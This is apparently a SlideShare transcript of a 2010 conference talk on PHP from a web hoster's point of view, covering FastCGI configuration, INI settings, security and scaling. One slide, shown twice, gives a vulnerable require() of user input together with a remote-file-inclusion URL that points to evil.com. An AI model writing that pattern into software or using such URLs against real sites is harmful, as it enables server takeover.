Php through the eyes of a hoster: PHPNW10
0 likes1,127 views
The document discusses PHP from the perspective of a hoster. It covers the hoster's role as a stakeholder in the PHP ecosystem, installation and configuration of PHP, PHP versions and features, how PHP attracts developers, security issues, and scalability considerations. The hoster aims to ensure PHP applications work, perform well, scale, are secure and available.
![INI
seings:
tales
of
good
&
evil
Allow_url_fopen:
<?php
$lang= $_GET['lang'];
require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?](https://image.slidesharecdn.com/phpthroughtheeyesofahosterphpnw-101006153425-phpapp02/85/Php-through-the-eyes-of-a-hoster-PHPNW10-27-320.jpg)
Php through the eyes of a hoster: PHPNW10
- 5. I live in the wonderful city of Bruges MPBecker ‐ Bruges by Night hXp://www.flickr.com/photos/galverson2/3715965933
- 6. Follow me on TwiXer: @ThijsFeryn Rate my talk: hXp://joind.in/2064 Read my blog: hXp://blog.feryn.eu
- 10. Stakeholders Customer Development company Endusers MGMT Devs MGMT Design PM Internal Internal IT PM Sales QA Systeam Consultants Hoster PHP community
- 11. Stakeholders Somewhere along the road ... Your app needs to be hosted
- 12. Goals & moTves Our goals & moTves are the same as yours: • It has to work • It has to perform • It has to scale • It has to be secure • It has to be available
- 19. SAPI ... schmapi Mod_php FastCGI CLI Web Apache module gateway ‐ Process Apache process php‐cgi php ConfiguraTon Apache conf files wrapper on the fly shell user or User Apache user shell user suexec user
- 20. FastCGI Example config: • Apache handler <IfModule mod_fcgid.c> SuexecUserGroup dev dev PHP_Fix_Pathinfo_Enable 1 <Directory /var/www/dev/www/> Options +ExecCGI AllowOverride All AddHandler fcgid‐script .php FCGIWrapper /var/www/dev/etc/fcgi.wrapper .php Order allow,deny Allow from all </Directory> </IfModule>
- 21. FastCGI Example config: • Wrapper script #!/bin/sh PHPRC=/usr/local/php‐5.3.1/etc export PHPRC export PHP_FCGI_MAX_REQUESTS=5000 export PHP_FCGI_CHILDREN=8 exec /usr/local/php‐5.3.1/bin/php‐cgi
- 23. INI seings: tales of good & evil Defining INI seings: • Php.ini • Ini_set() • “‐d” • php_value • php_flag • php_admin_value • php_admin_flag
- 24. INI seings: tales of good & evil Memory_limit: Fatal error: Allowed memory size of 16777216 bytes exhausted (tried to allocate 35 bytes)
- 27. INI seings: tales of good & evil Allow_url_fopen: <?php $lang= $_GET['lang']; require("$lang.php"); http://domain.ext/index.php?lang=http://evil.com/hack.txt?
- 30. PHP 4: End of life, but far from dead Parse error: syntax error, unexpected T_STRING, expecting T_OLD_FUNCTION or T_FUNCTION or T_VAR or '}' in test.php on line 4
- 37. Fruit & vegetables: PEAR & PECL PECL (pickle) PHP Extension Community Library (h#p//pecl.php.net) server$ pecl install pecl_http
- 38. External frameworks Popular frameworks outside the PHP project
- 40. It’s easy !
- 41. That easy ! <?php echo "Hello world!";
- 42. It’s cheap !
- 43. It’s stable !
- 49. They reach out to the PHP community User Group meeTngs TwiXer Blogs Forums PHP.net IRC Conferences
- 53. False assumpTons “Open source is evil” “PHP has lots of security vulnerabiliTes and is not mature”
- 54. Here be phpirates The real issues • Quality of the code • Network & server security • PHP version & configuraTon
- 55. ResponsibiliTes
- 59. Scaling up
- 60. Scaling out
- 62. Scaling MySQL
- 68. Memcached
- 69. Gearman
- 70. Varnish
- 71. Summary
- 72. Summary 1.Hosters are a genuine stakeholder in the PHP universe 2.PHP is highly flexible & configurable. Hosters have to ensure a decent setup 3.PHP has a lot to offer feature‐wise 4.PHP aXracts a crowd and brings a lot of people together from different industries (e.g. hosters) 5.Lots of abuse cases are PHP related, but that’s not the fault of PHP itself 6.PHP itself doesn’t scale *that* well, but is flexible enough to ensure scalability via extra tools
- 73. Q&A